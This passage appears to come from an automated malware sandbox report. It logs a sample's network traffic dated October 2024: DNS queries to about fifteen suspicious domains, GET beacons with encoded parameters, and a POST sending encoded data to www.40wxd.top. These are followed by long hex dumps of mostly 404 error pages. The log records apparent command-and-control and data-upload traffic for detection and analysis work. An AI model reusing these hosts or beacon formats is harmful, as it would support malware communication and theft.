            Source: global trafficHTTP traffic detected: GET /u6k6/?AHkx=dY5LfBxT8+4OTYgUENZhMVKOyd75/pKzLeRRn9zdsxFld7n68myH2Gd2W2FS03HPt+W/9NATFibZyiY45uryWU5ty+AJNLXNUa+K51k8edVyQTCKjNaYJ5Y=&rf-LZ=JlCtuN3HqPO8C HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.healthyloveforall.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /jqkr/?AHkx=j99yFPFWu1ukFCAnSMaPoqYJsGaKTyAIw9CibMKFTP9vYaGLd9Ca8ZMxvCgy8ZIQlD5WNv+rF4xM8fWyLzqu+KoA1mYPwgzWoJCMPt1Uicxvw1jTfpaTUc0=&rf-LZ=JlCtuN3HqPO8C HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.lurknlarkk.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /hya5/?rf-LZ=JlCtuN3HqPO8C&AHkx=kBImd3s/QyLjHyq7crISF49n+tt0DF04aEwkxNbGH3XUM96sRoRP4M1J0fvTDuXIyYiaCoNXLmg3Qmdc8wSzVCSMG3zCGblVdbb3qd6x39FLIiPv6fMrlbs= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.mommymode.siteConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /nuqv/?AHkx=cqR4daz/40w4b6reEtYQuTL/A0OxFlThnuSAX3LrEIyAZ4914Ww4a7UdeW+JTGwq/HZWal2FK/CEDxgqbNyvw1T8M+Okxh6a/XFlGr4hKR5quINsThV8goc=&rf-LZ=JlCtuN3HqPO8C HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.polarmuseum.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficDNS traffic detected: DNS query: www.newdaydawning.net
            Source: global trafficDNS traffic detected: DNS query: www.40wxd.top
            Source: global trafficDNS traffic detected: DNS query: www.uburn.xyz
            Source: global trafficDNS traffic detected: DNS query: www.i16zb920d.cfd
            Source: global trafficDNS traffic detected: DNS query: www.o731lh.vip
            Source: global trafficDNS traffic detected: DNS query: www.nakama2-sshl.xyz
            Source: global trafficDNS traffic detected: DNS query: www.zz82x.top
            Source: global trafficDNS traffic detected: DNS query: www.tukaari.shop
            Source: global trafficDNS traffic detected: DNS query: www.prj81oqde1.buzz
            Source: global trafficDNS traffic detected: DNS query: www.komart.shop
            Source: global trafficDNS traffic detected: DNS query: www.healthyloveforall.net
            Source: global trafficDNS traffic detected: DNS query: www.lurknlarkk.xyz
            Source: global trafficDNS traffic detected: DNS query: www.mommymode.site
            Source: global trafficDNS traffic detected: DNS query: www.polarmuseum.info
            Source: global trafficDNS traffic detected: DNS query: www
            Source: unknownHTTP traffic detected: POST /l8if/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflateHost: www.40wxd.topOrigin: http://www.40wxd.topConnection: closeCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 201Referer: http://www.40wxd.top/l8if/User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)Data Raw: 41 48 6b 78 3d 53 5a 66 34 5a 58 5a 4c 52 75 44 38 6c 6b 56 43 71 6d 35 35 46 72 69 71 72 56 46 41 7a 6f 4c 6d 36 53 4f 4e 47 79 4d 77 54 52 53 30 69 44 4b 63 52 4b 56 6d 30 6c 49 4c 44 50 4d 46 6f 47 2f 33 64 71 4e 7a 52 4e 56 74 70 42 4b 45 6d 37 72 47 62 67 34 34 6e 32 52 53 6f 68 54 30 58 46 4f 77 71 44 6a 6f 54 65 72 65 4e 51 39 5a 63 41 6e 41 62 44 58 45 63 59 2f 46 52 6f 6d 68 72 63 4d 46 33 74 58 31 76 74 55 6d 52 4a 52 52 69 63 2f 69 69 59 32 42 34 62 4c 66 6f 71 38 54 78 5a 56 6d 33 65 68 72 35 77 39 31 46 5a 75 6b 70 45 30 31 65 59 72 46 79 50 31 58 56 68 43 51 64 5a 32 50 35 67 3d 3d Data Ascii: AHkx=SZf4ZXZLRuD8lkVCqm55FriqrVFAzoLm6SONGyMwTRS0iDKcRKVm0lILDPMFoG/3dqNzRNVtpBKEm7rGbg44n2RSohT0XFOwqDjoTereNQ9ZcAnAbDXEcY/FRomhrcMF3tX1vtUmRJRRic/iiY2B4bLfoq8TxZVm3ehr5w91FZukpE01eYrFyP1XVhCQdZ2P5g==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 12:19:24 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 12:19:27 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 12:19:29 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 12:19:32 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 12:19:39 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 32106X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 
4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 12:19:41 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 32106X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 
4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 12:19:44 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 32106X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 
4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 12:19:46 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 32106X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 
2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 12:20:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://nakama2-sshl.xyz/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 31 38 63 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 5c 7b 93 23 d5 75 ff 7b a7 8a ef d0 68 0c d2 10 b5 5a ad c7 bc 56 33 ce f2 72 a8 c2 40 60 89 8b 2c 5b 53 ad 56 4b ea d9 56 b7 dc dd 9a 07 cb 56 ed cc 60 17 60 1c b0 0d 26 04 c7 b1 89 0d 6b b0 89 09 54 8a 00 09 df 25 cd ec b2 7f e5 2b e4 77 ee bd dd ea 6e b5 46 1a 69 96 24 55 4c ed ce 48 f7 71 5e f7 9c 73 cf 3d 7d 6e 37 ee 7e f0 f1 07 2e 3e f3 c4 43 52 d7 ef 59 9b 0b 8d bb 65 f9 92 d9 96 2c 5f 7a e4 21 69 e5 32 5a a8 43 d2 2d cd f3 36 72 a6 b1 9c 93 2c cd ee 6c e4 b6 b5 dc a6 d4 b8 fb 92 61 b7 cc f6 65 59 1e ce cd 9c b8 32 d5 bc d5 51 84 93 e7 75 18 ad 98 4a c4 87 04 47 44 86 a4 e7 36 17 ce d1 80 04 c9 e7 1a 5d 43 6b 49 7d d7 68 9b 7b 1b 39 a7 b3 0e 39 f8 fd 75 45 71 3a fd 52 cf 50 6c 6f 51 6a 37 47 5b 95 76 73 51 d2 5c df d4 2d 23 a3 57 f4 2c 12 d2 73 8d 9e e1 6b 92 de d5 5c cf f0 37 72 4f 5f 7c 58 5e cd 49 c3 1e 5b eb 19 1b b9 1d d3 d8 ed 3b ae 9f 93 74 c7 f6 0d 1b 23 77 cd 96 df dd 68 